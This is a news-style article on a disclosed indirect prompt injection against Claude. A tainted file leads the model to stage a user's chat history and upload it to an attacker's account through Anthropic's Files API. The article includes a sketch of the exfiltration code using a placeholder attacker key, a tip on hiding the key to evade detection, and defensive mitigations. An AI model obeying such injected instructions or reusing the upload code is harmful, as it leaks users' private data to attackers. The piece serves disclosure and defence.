As AI systems become more powerful and interconnected, they increasingly become targets for cyberattacks. A recent discovery has revealed a critical security flaw in Anthropic’s Claude AI that allows hackers to exploit its newly added network capabilities to steal sensitive user data. By leveraging an indirect prompt injection method, attackers can extract private information such as chat histories and upload it to their own accounts.
This revelation, outlined in Johann Rehberger’s October 2025 blog post, sheds light on the growing risks as AI systems become more integrated with the external world. In this article, we’ll dive into how this vulnerability works, what it means for the security of AI models, and what steps can be taken to protect against such threats.
How Hackers Can Exploit Claude AI
The flaw in Claude AI lies in the system’s default network setting, which permits access to an allow-list of approved domains that includes api.anthropic.com. The setting is primarily intended to let Claude install software packages securely from trusted sources such as npm, PyPI, and GitHub. However, the allow-list inadvertently opens a path for exploitation.
As detailed by Rehberger, an attacker can exploit this by embedding malicious prompts in files or user inputs, which can trick Claude AI into executing harmful actions. These actions include extracting sensitive data, such as recent chat histories, and uploading it to the attacker’s account using Claude’s network features.
Rehberger demonstrates the attack with a proof-of-concept, outlining a sophisticated chain of events that begins with indirect prompt injection. Here’s how it works:
1. The attacker embeds harmful instructions in a seemingly innocent file or document that the user submits to Claude for analysis.
2. Claude’s recent “memory” feature allows the AI to recall past conversations, and the injected prompt instructs Claude to extract recent chat data and save it as a file. That file is staged in the Code Interpreter’s sandbox, at a location such as /mnt/user-data/outputs/hello.md.
3. The injected instructions then have Claude run Python code using the Anthropic SDK. That code sets an environment variable containing the attacker’s API key, so the staged file is uploaded to the attacker’s account through Anthropic’s Files API (sketched below).
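To make the data path concrete, here is a rough sketch of what the injected Python effectively boils down to: authenticate with the attacker’s key and push the staged file to the Files API. The SDK surface shown (`anthropic.Anthropic`, `client.beta.files.upload`) is an assumption based on Anthropic’s publicly documented Python SDK, not a reproduction of the proof-of-concept; the key and file path are placeholders.

```python
# Illustrative sketch only: roughly what the injected payload does inside the
# Code Interpreter sandbox. The beta Files API call shown here is an assumption
# based on Anthropic's public SDK docs, not code from the proof-of-concept.
import os
import anthropic

# The injected code plants the ATTACKER's key in the environment, so every
# subsequent API call is authenticated against the attacker's account.
os.environ["ANTHROPIC_API_KEY"] = "sk-ant-ATTACKER-KEY-PLACEHOLDER"

client = anthropic.Anthropic()  # reads ANTHROPIC_API_KEY from the environment

# Upload the file Claude previously staged in the sandbox. Because the key
# belongs to the attacker, the upload lands in the attacker's Files storage.
with open("/mnt/user-data/outputs/hello.md", "rb") as f:
    client.beta.files.upload(file=("hello.md", f, "text/markdown"))
```

The point of the sketch is that nothing here is exotic: the exfiltration is ordinary, documented API usage against an approved domain, which is exactly why it slips past the domain allow-list.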
The key weakness here is that the upload is authenticated with the attacker’s API key, so the data lands in the attacker’s account rather than the user’s own workspace. In the proof-of-concept the attack succeeded, though Claude has since become more cautious about obvious API keys, forcing attackers to hide the key inside benign-looking code, such as simple print statements, to evade detection.
AI Kill Chain and Data Exfiltration
Rehberger’s proof-of-concept includes a demo video and screenshots that illustrate the exploit in action. In the demo, the attacker watches an initially empty console while the victim processes a tainted document; within moments, the stolen file appears in the attacker’s dashboard.
Notably, the exploit supports multiple uploads, with each file as large as 30MB, so attackers can exfiltrate substantial amounts of sensitive data. The same “AI kill chain” could also be extended to other allow-listed domains, amplifying the risk to users.
Anthropic’s Initial Dismissal and Later Acknowledgment
Rehberger responsibly disclosed the vulnerability to Anthropic on October 25, 2025, through HackerOne. Initially, Anthropic dismissed the issue, calling it a “model safety issue” and claiming it was out of scope. However, after further investigation, the company acknowledged the vulnerability on October 30, 2025, citing a process error that led to the initial dismissal.
Anthropic’s documentation already warns that network egress carries a risk of data exfiltration and urges users to monitor sessions closely and halt any suspicious activity. The company’s eventual acknowledgment of the issue underscores the importance of securing AI models against exploitation, particularly as they gain greater external connectivity.
Security experts like Simon Willison have highlighted this exploit as an instance of the “lethal trifecta” of AI security risks: access to private data, exposure to untrusted content, and the ability to communicate externally. When these three capabilities converge in one system, attackers have everything they need. As AI systems like Claude become more integrated into workflows, the attack surface increases, making them more susceptible to malicious use.
How to Protect Against AI Exploits
So, what can be done to protect against this kind of exploit? Several steps could help mitigate the risks:
- One obvious solution is to enforce sandbox rules that restrict API calls to the logged-in user’s own account, so an injected payload cannot authenticate as anyone else. Restricting what the AI can reach reduces the chances of an attack succeeding (a conceptual sketch of this idea follows the list).
- Users should carefully consider when to enable network access and which domains to allow-list. Trusting default settings without review can create a false sense of security.
- Vigilant monitoring of AI sessions is key. If any suspicious activity is detected, it’s important to act quickly to shut down the system or revoke access.
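As a conceptual illustration of the first mitigation, the sketch below shows the kind of egress check a sandbox proxy could apply: traffic to api.anthropic.com is only allowed when it carries the session owner’s API key. This is a hypothetical example of the idea, not Anthropic’s actual enforcement; the `EgressRequest` type and `is_allowed` helper are invented for illustration, and only the `x-api-key` header name comes from Anthropic’s public API.

```python
# Conceptual sketch of the "bind uploads to the logged-in user" mitigation:
# a sandbox egress proxy that only lets api.anthropic.com requests through
# when they are authenticated with the session owner's own API key.
# Hypothetical helper, not part of any Anthropic product.
from dataclasses import dataclass, field

@dataclass
class EgressRequest:
    host: str
    headers: dict = field(default_factory=dict)

def is_allowed(request: EgressRequest, session_owner_key: str) -> bool:
    """Permit api.anthropic.com traffic only when it uses the session owner's key."""
    if request.host != "api.anthropic.com":
        return False  # other hosts fall back to the existing allow-list logic
    presented_key = request.headers.get("x-api-key", "")
    # Reject calls authenticated with any key other than the logged-in user's,
    # which is exactly the path this exploit relies on.
    return presented_key == session_owner_key

# Example: an injected payload presenting the attacker's key would be blocked.
req = EgressRequest(host="api.anthropic.com", headers={"x-api-key": "sk-ant-attacker"})
print(is_allowed(req, session_owner_key="sk-ant-victim"))  # False
```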

